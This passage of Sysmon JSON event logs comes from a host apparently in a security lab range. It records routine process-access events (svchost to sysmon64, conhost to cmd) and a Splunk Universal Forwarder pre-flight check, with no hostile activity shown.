05:48:42.184","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3277,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.184\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.184","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3278,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.184\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.184","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3279,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.184\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.184","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3280,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.184\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.184","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3281,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.184\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.184","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3282,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.184\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.184","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3283,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.184\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-023A-5F25-0000-0010582F0500}\r\nTargetProcessId: 4300\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.184","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-023A-5F25-0000-0010582F0500}","TargetProcessId":"4300","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3284,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.198\r\nProcessGuid: {A837DB8D-023A-5F25-0000-001019300500}\r\nProcessId: 4368\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nFileVersion: 8.0.2\r\nDescription: splunk Application\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt \r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3\r\nParentProcessGuid: {A837DB8D-023A-5F25-0000-0010582F0500}\r\nParentProcessId: 4300\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal pre-flight-checks --answer-yes --no-prompt 2>&1","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.198","ProcessGuid":"{A837DB8D-023A-5F25-0000-001019300500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","FileVersion":"8.0.2","Description":"splunk Application","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3","ParentProcessGuid":"{A837DB8D-023A-5F25-0000-0010582F0500}","ParentProcessId":"4300","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal pre-flight-checks --answer-yes --no-prompt 2&gt;&amp;1","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
